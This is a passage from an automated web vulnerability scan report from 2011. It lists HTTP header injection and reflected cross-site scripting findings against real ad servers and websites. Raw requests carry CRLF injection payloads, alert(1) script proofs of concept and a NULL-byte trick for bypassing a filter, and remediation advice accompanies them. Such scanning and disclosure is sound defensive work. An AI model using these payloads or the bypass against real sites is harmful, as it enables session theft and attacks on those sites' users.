GET /82d2a%0d%0a2431e9af5a3/reg.security.4159/front;tile=1;pos=top;dcove=d;sz=728x90;ord=TSovV8CoATgAAEs2Y5YAAAGD? HTTP/1.1
Host: ad.uk.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/82d2a
2431e9af5a3
/reg.security.4159/front%3Btile%3D1%3Bpos%3Dtop%3Bdcove%3Dd%3Bsz%3D728x90%3Bord%3DTSovV8CoATgAAEs2Y5YAAAGD:
Date: Wed, 12 Jan 2011 03:22:51 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.13. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerRedirect.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 56821%0d%0aee102f7460c was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerRedirect.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=056821%0d%0aee102f7460c; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=056821
ee102f7460c
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:20:07 GMT
Connection: close


2.14. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload f3a55%0d%0a27a427f88d was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=1922091&Page=&PluID=0&Pos=8865\ HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0f3a55%0d%0a27a427f88d; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-281/Type-0/7b4b3e72-c3e8-4733-aa25-3c5dffe10972.gif
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0f3a55
27a427f88d
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=fUFGa5O+02WG0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7lgH0820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uP4820wsI000w000_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uP402HA820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+r820wsG02WGg410sI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_8865\=4164202
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:22:56 GMT
Connection: close


2.15. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 8d759%0d%0a51104ebddf5 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=08d759%0d%0a51104ebddf5; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=08d759
51104ebddf5
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:21:00 GMT
Connection: close


2.16. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload c4033%0d%0acf86744927b was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4164202%7E%7E0%5EebAdDuration%7E18%7E0%7E1%7E0%7E2%7E0%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.9409657982178032&flv=c4033%0d%0acf86744927b&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Origin: http://www.theregister.co.uk
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=7c038cd2-da51-45cb-9ace-ed6278dfd0773G9010; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=7c038cd2-da51-45cb-9ace-ed6278dfd0773G9010; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=c4033
cf86744927b
&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:26 GMT
Connection: close
Content-Length: 0


2.17. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 760e7%0d%0abee3cb0b4fa was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4164202%7E%7E0%5EebAdDuration%7E18%7E0%7E1%7E0%7E2%7E0%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.9409657982178032&flv=10.1103&wmpv=0&res=760e7%0d%0abee3cb0b4fa HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Origin: http://www.theregister.co.uk
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=aafc6ac3-c8d9-475e-94e2-b0ca1f5b4cee3G9010; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=aafc6ac3-c8d9-475e-94e2-b0ca1f5b4cee3G9010; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=760e7
bee3cb0b4fa
&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:27 GMT
Connection: close
Content-Length: 0


2.18. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 74b8f%0d%0a8312f755b94 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4164202%7E%7E0%5EebAdDuration%7E18%7E0%7E1%7E0%7E2%7E0%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.9409657982178032&flv=10.1103&wmpv=74b8f%0d%0a8312f755b94&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Origin: http://www.theregister.co.uk
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=024f98eb-350f-4908-b357-ea686989a5173G9010; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=024f98eb-350f-4908-b357-ea686989a5173G9010; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=74b8f
8312f755b94
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:27 GMT
Connection: close
Content-Length: 0


2.19. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload da838%0d%0a0be295012bc was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1901699&PluID=0&w=300&h=250&ord=2011.01.09.21.57.52&ifrm=2&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://download.cnet.com/8301-2007_4-20027809-12.html?tag=mncol;title
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: E2=09MY8y8ysF; A2=gn3Ka4JO09MY00008y8ysF; B2=83xP08y8ysF; C3=0u3F8y8ysF0000040_; D3=0u3F00358y8ysF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; u3=1; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0da838%0d%0a0be295012bc

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0da838
0be295012bc
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4JO09MY00008y8ysFfU+La5OG0a+r0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP08y8ysF7gi30820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F8y8ysF0000040_0uO9820wsI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F00358y8ysF0uO9002P820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+r820wsI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:02:35 GMT
Connection: close
Content-Length: 2224

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...

2.20. http://download.cnet.com/8737-1_1-0.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8737-1_1-0.xml

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8dbf5%0d%0a555872e04e3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8737-1_1-0.xml8dbf5%0d%0a555872e04e3 HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 12 Jan 2011 03:41:04 GMT
Server: Apache/2.2
Location: http://www.cnet.com/8737-1_1-0.xml8dbf5
555872e04e3

Content-Length: 260
Keep-Alive: timeout=15, max=995
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Expires: Wed, 12 Jan 2011 03:41:04 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.cnet.com/873
...[SNIP]...

3. Cross-site scripting (reflected)
There are 79 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.insightexpressai.com/adserver/adServer.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.insightexpressai.com
Path:   /adserver/adServer.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0061395'%3balert(1)//6e3b1b635e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61395';alert(1)//6e3b1b635e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adserver/adServer.aspx?publisherID=338&%0061395'%3balert(1)//6e3b1b635e0=1 HTTP/1.1
Host: ad.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 12 Jan 2011 03:06:15 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: IXAICampaignCounter2310=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:06:16 GMT; path=/
Set-Cookie: IXAIControlCounter2310=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:06:16 GMT; path=/
Set-Cookie: IXAIBannerCounter174065=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:06:16 GMT; path=/
Set-Cookie: IXAIBanners2310=174065; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:06:16 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Wed, 12 Jan 2011 03:06:16 GMT
Connection: close
Content-Length: 1427

//174065

var lInsightExpress = {};
   lInsightExpress.AddEvent = function(obj, evType, fn)
   {
       if (obj.addEventListener){
           obj.addEventListener(evType, fn, false);
           return true;
       }
...[SNIP]...
s.type='text/javascript';
s.src = 'http://ad.insightexpressai.com/adServer/GetInvite.aspx?bannerID=174065&referer=www.wired.com&iCompass=true&SiteExpiration=21600&PublisherID=338&.61395';alert(1)//6e3b1b635e0=1&';
document.getElementsByTagName('body')[0].appendChild(s);
}
lInsightExpress.Poll();
   });

3.2. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00c56e6<a>719b7d4f23f was submitted in the REST URL parameter 1. This input was echoed as c56e6<a>719b7d4f23f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00c56e6<a>719b7d4f23f/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 13:01:37 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1643
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>719b7d4f23f/">weblog%00c56e6<a>719b7d4f23f</a>
...[SNIP]...

3.3. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00edcf5"><script>alert(1)</script>81045f888fa was submitted in the REST URL parameter 1. This input was echoed as edcf5"><script>alert(1)</script>81045f888fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00edcf5"><script>alert(1)</script>81045f888fa/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 13:01:37 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1789
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%00edcf5"><script>alert(1)</script>81045f888fa/2006/">
...[SNIP]...

3.4. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9a9a7<a>1c64490ce0a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/03/base9a9a7<a>1c64490ce0a/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
